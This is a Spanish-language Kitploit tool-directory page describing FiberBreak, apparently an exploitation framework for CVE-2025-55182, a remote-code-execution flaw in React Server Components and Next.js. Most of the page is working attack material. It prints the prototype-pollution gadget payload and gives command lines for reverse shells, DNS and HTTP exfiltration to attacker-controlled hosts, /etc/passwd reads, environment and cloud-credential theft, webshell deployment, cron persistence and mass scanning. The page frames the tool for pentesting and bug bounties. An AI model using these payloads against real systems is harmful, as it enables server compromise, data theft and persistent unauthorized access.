Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
FiberBreak — Herramienta de explotación React2Shell (CVE-2025-55182) | Kitploit
Herramientas/GitHubGitHub/scumfrog/fiberbreak
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosPost-ExplotaciónPruebas de PenetraciónSeguridad en la NubeComando y ControlRed TeamingDesarrollo de Payloads
61hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHubscumfrog/fiberbreak

FiberBreak

Herramienta de explotación React2Shell (CVE-2025-55182)

Ver Repositorio
Compartir

FiberBreak

Marco de explotación para CVE-2025-55182 (React2Shell) - vulnerabilidad crítica de RCE en React Server Components.

Resumen

  • CVE: CVE-2025-55182
  • CVSS: 10.0 (CRÍTICA)
  • Tipo: Ejecución remota de código (RCE)
  • Afectados: React 19.0.0-rc.0 a 19.0.0, Next.js 15.0.0 a 15.0.3
  • Descubrimiento: Lachlan Miller (SonarSource)
  • PoC pública: maple3142

Instalación

# Clone repository
git clone https://github.com/scumfrog/fiberbreak
cd fiberbreak

# Install dependencies
pip install -r requirements.txt

# Make executable
chmod +x fiberbreak.py

Inicio rápido

# Build vulnerable testing environment
docker-compose up -d

# Wait for startup
sleep 20

# Test detection
./fiberbreak.py -u http://localhost:3000 detect

# Execute RCE
./fiberbreak.py -u http://localhost:3000 exploit -c "whoami"

# Verify
docker exec react2shell-lab ls -la /tmp/

Detalles técnicos

Resumen de la vulnerabilidad

CVE-2025-55182 es una vulnerabilidad crítica de ejecución remota de código en React Server Components (RSC) que permite a atacantes no autenticados ejecutar código arbitrario en el servidor.

Causa raíz: el protocolo React Flight deserializa entradas no confiables del cliente sin una validación adecuada, lo que permite a los atacantes crear payloads maliciosos que abusan de la cadena de prototipos de JavaScript y del constructor Function.

Vector de ataque: los atacantes envían una solicitud POST multipart/form-data manipulada con una cabecera Next-Action a cualquier endpoint RSC. El payload malicioso aprovecha:

  1. La polución de prototipos mediante el acceso a __proto__
  2. La exposición del constructor Function mediante constructor:constructor
  3. La resolución de la promesa para desencadenar la ejecución de código

Flujo de explotación

1. El atacante envía una solicitud POST manipulada
   └─ multipart/form-data con JSON malicioso
   └─ Cabecera Next-Action (cualquier valor)

2. El servidor deserializa el payload
   └─ React procesa el formato de chunk RSC
   └─ Resuelve el objeto tipo Promise

3. La cadena de gadgets se activa
   └─ El acceso a __proto__ evita las comprobaciones de hasOwnProperty
   └─ constructor:constructor expone Function()
   └─ _prefix ejecuta código arbitrario

4. Se logra RCE
   └─ El servidor ejecuta el JavaScript del atacante
   └─ Compromiso total del sistema

El gadget

{
  "then": "$1:__proto__:then",           // Prototype pollution
  "status": "resolved_model",            // Fake React internal state
  "reason": -1,                          // Trigger resolution
  "value": '{"then":"$B1337"}',         // Blob reference
  "_response": {
    "_prefix": "MALICIOUS_CODE_HERE;",   // Executed code
    "_formData": {
      "get": "$1:constructor:constructor" // Function() access
    }
  }
}

Ruta de código afectada

// react-server-dom-webpack/src/ReactFlightClient.js
function resolveModelChunk(chunk) {
  const value = JSON.parse(chunk.value);
  
  // Missing validation here allows malicious chunks
  if (value && typeof value.then === 'function') {
    // Attacker controls 'then' method
    value.then(/* ... */);
  }
}

Uso

Detección de vulnerabilidades

# Single target detection
./fiberbreak.py -u https://target.com detect

# Multiple targets from file
./fiberbreak.py -l targets.txt detect --threads 20

# Save results to JSON
./fiberbreak.py -l targets.txt detect -o results.json

# Disable SSL verification
./fiberbreak.py -u https://target.com detect --no-verify-ssl

Explotación básica

# Simple blind command execution
./fiberbreak.py -u https://target.com exploit -c "whoami"

# Write file to disk
./fiberbreak.py -u https://target.com exploit \
  -c "/tmp/pwned.txt:HACKED" -t write_file

# Read file contents
./fiberbreak.py -u https://target.com exploit \
  -c "/etc/passwd:https://attacker.com" -t file_read

Explotación avanzada

# Reverse shell
./fiberbreak.py -u https://target.com exploit \
  -c "10.10.10.10:4444" -t reverse_shell

# DNS exfiltration (stealthy, no HTTP traffic)
./fiberbreak.py -u https://target.com exploit \
  -c "whoami:attacker.oastify.com" -t dns_exfil

# HTTP exfiltration with output
./fiberbreak.py -u https://target.com exploit \
  -c "id:https://attacker.com/exfil" -t http_exfil

# Environment variable dump
./fiberbreak.py -u https://target.com exploit \
  -c "https://attacker.com/env" -t env_dump

# System reconnaissance
./fiberbreak.py -u https://target.com exploit \
  -c "https://attacker.com/recon" -t recon

# Stealth DNS beacon (no command output)
./fiberbreak.py -u https://target.com exploit \
  -c "attacker.oastify.com" -t stealth_beacon

Explotación en la nube

# Auto-detect cloud provider and extract credentials
# Supports: AWS, GCP, Azure, DigitalOcean, Oracle Cloud, Alibaba Cloud
./fiberbreak.py -u https://target.com exploit \
  -c "https://attacker.com/cloud" -t cloud_metadata

Tipos de payload

TipoFormatoDescripciónSalida
simplecommandEjecuta cualquier comando de shellA ciegas
outputcommand + --callbackEjecuta con callback HTTPSí
reverse_shelllhost:lportShell inversa BashInteractiva
dns_exfilcmd:domain o domainExfiltración por DNSRegistros DNS
http_exfilcmd:callback_urlExfiltración por HTTPHTTP POST
file_readfilepath:callbackLee y exfiltra un archivoHTTP POST
write_filefilepath:contentEscribe un archivo en discoA ciegas
env_dumpcallback_urlVolcado de variables de entornoHTTP POST
cloud_metadatacallback_urlExtrae credenciales de la nubeHTTP POST
reconcallback_urlReconocimiento del sistemaHTTP POST
stealth_beacondomainBeacon DNSRegistros DNS
webshellfilepathDespliega una webshell Node.jsPuerto 8080
persistcallback_urlInstala persistencia cronTarea cron

Escenarios del mundo real

Caza de Bug Bounty

# 1. Stealthy detection with DNS beacon
./fiberbreak.py -u https://target.com exploit \
  -c "recon.yourburp.oastify.com" -t stealth_beacon

# 2. If vulnerable, extract sensitive data
./fiberbreak.py -u https://target.com exploit \
  -c "https://yourserver.com/exfil" -t env_dump

# 3. Check for cloud environment
./fiberbreak.py -u https://target.com exploit \
  -c "https://yourserver.com/cloud" -t cloud_metadata

# 4. Document findings without causing damage

Pruebas de penetración

# Phase 1: Detection
./fiberbreak.py -u https://target.com detect -o detection.json

# Phase 2: Verification
./fiberbreak.py -u https://target.com exploit \
  -c "/tmp/pentest_proof.txt:PENTEST_$(date +%s)" -t write_file

# Phase 3: Impact Assessment
./fiberbreak.py -u https://target.com exploit \
  -c "https://pentest-server.com/impact" -t recon

# Phase 4: Credential Extraction (if cloud)
./fiberbreak.py -u https://target.com exploit \
  -c "https://pentest-server.com/creds" -t cloud_metadata

# Phase 5: Interactive Access (if authorized)
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Get shell
./fiberbreak.py -u https://target.com exploit \
  -c "YOUR_IP:4444" -t reverse_shell

Escaneo masivo de vulnerabilidades

# Create target list
cat > targets.txt << EOF
https://app1.company.com
https://app2.company.com
https://app3.company.com
https://api.company.com
EOF

# Scan all targets in parallel
./fiberbreak.py -l targets.txt detect --threads 50 -o scan_results.json

# Filter vulnerable targets
cat scan_results.json | jq '.[] | select(.vulnerable==true) | .url'

# Generate report
cat scan_results.json | jq '{
  total: length,
  vulnerable: [.[] | select(.vulnerable==true)] | length,
  targets: [.[] | select(.vulnerable==true) | .url]
}'
Descargar herramienta